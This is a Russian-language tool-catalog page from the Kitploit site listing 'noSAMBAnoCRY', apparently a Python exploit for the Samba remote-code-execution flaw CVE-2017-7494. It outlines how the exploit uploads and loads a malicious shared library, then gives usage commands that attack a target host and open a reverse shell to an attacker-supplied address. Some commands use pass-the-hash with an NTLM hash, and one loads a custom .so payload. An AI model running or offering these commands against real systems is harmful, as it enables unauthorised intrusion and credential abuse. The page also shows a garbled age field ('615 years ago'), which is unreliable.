Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
noSAMBAnoCRY-CVE-2017-7494 — python-эксплойт для CVE-2017-7494 | Kitploit
Инструменты/GitHubGitHub/0xm4ud/nosambanocry-cve-2017-7494
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHub0xm4ud/nosambanocry-cve-2017-7494

noSAMBAnoCRY-CVE-2017-7494

python-эксплойт для CVE-2017-7494

Репозиторий
615 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

noSAMBAnoCRY CVE-2017-7494

Удаленный эксплойт для уязвимости SAMBA CVE-2017-7494, также известной как is_know_pipename!

Подробности

Этот эксплойт разделен на 3 части:

  • Компилирует evilLib для следующих архитектур: x86_64, x86 или i686
  • Находит раздел с правами на запись и загружает туда evilLib!
  • Загружает evilLib, и если все прошло успешно — RCE!

Пока цель уязвима и полезная нагрузка соответствует операционной системе и архитектуре цели, эксплойт довольно надежен.

Как использовать

Запустите эксплойт против цели и дождитесь появления оболочки:

root@kitploit:~
$ python noSAMBAnoCRY.py -r RHOST
root@kitploit:~
$ python noSAMBAnoCRY.py -r RHOST -u userTest -P 123 --lhost RevShellIP --lport RevShellPort 

Для версий Samba 3.5.0 > 3.6.0 просто добавьте аргумент -o 1

root@kitploit:~
python noSAMBAnoCRY.py -r RHOST --lhost LHOST --lport LPORT -o 1

Запустите свой собственный .so файл

root@kitploit:~
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes 00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 -c cp.so

Для нестандартного порта Samba используйте аргумент -p

root@kitploit:~
$ python noSAMBAnoCRY.py -t RHOST -p 4450 -u userTest -P 123 --rhost shell_ip --rport shell_port

Если вы столкнулись с хэшами smbpasswd и не можете их взломать, теперь вы можете выполнить pass-the-hash с помощью аргумента --hashes=LM:NT

root@kitploit:~
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes=00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 --lhost RevShellIP

Отказ от ответственности

Этот репозиторий вдохновлен репозиториями: joxeankoret/exploit-CVE-2017-7494 и Archivaldo

Скачать инструмент